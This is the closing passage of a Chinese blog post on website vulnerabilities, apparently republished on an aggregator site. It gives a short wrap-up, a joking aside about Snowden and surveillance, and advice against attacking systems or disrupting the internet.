好了，啰啰嗦嗦終于完了，我都快受不了了！歐碼噶的，大總結不知道寫點神馬了？這次寫的也不夠全面，只是片面的一面而已，也是常見的，為什么寫？因為很多網站提交的漏洞70%來自以上漏洞。當然還有各種框架漏洞（比如：struts2,記得前幾天這個漏洞再次爆出，使用springmvc的高興了一番，炫耀自己用這個沒問題，我想說的是，你錯了！springmvc照樣有可執(zhí)行漏洞，只是沒有被爆！）有時間了好好整理一番！還有很多沒講到的！包括我們如何來開發(fā)一款自己的黑客工具等等！一點要講的，我們必須清楚沒有最安全的只有更安全的！如果不是斯諾登的爆料有幾個人關系自己被美利堅合眾國偷窺者？沒報之前還覺得自己曼妙的舞姿，爆料了，大家這個時候才覺得自己在光著屁股在路上走，各國總統(tǒng)憋不住掩耳盜鈴的滋味了，開始嘶吼你丫的太不厚道了吧，背后給我玩陰的！各國媒體更是更是唯恐天下不亂，大肆描畫著藍圖！新聞狂轟亂炸！奧先生或許在想，你們把我腫么樣？我還是在監(jiān)聽！我們的xi先生笑了，你丫的監(jiān)控？我們走的是自主研發(fā)！最后！我和我的小伙伴們都笑了（此段僅供娛樂）。

善意的忠告：

不要試圖作為一名黑客而黑客，黑客的門檻很高，很多人花錢買的一些教程都過時了，駭客做的基本都是xp下做的，要知道微軟明年將終結xp baby,不是每一個程序員就能做黑客，黑客有自己的文化、精神、黑客心理學，不吹噓的講，黑客的聰明就是程序員的逆向思維！還是那句話，真正的黑客不以攻擊為目的。黑客————就是一種信仰！也不要隨意的去破壞互聯(lián)網正常的發(fā)展秩序，當然如果你作為一名駭客而活著那您隨意，每年國外都有這樣空前的駭客盛會！但是我的忠告是如果你繼續(xù)活在我朝，我朝貌似出臺了互聯(lián)網管理辦法，明確會處罰破壞互聯(lián)網穩(wěn)定的行為！道，可道，非常道。名，可名，非常名。一切皆塵埃。

ps:如果你沒有看過上篇，傳送：http://www.cnblogs.com/Beyond-bit/p/XWork_Lead_To_Struts2Bug.html

轉載于:https://www.cnblogs.com/Beyond-bit/p/Harcker_Is_Secret.html

總結

以上是生活随笔為你收集整理的程序世界系列之-带你了解安全背后的秘密的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。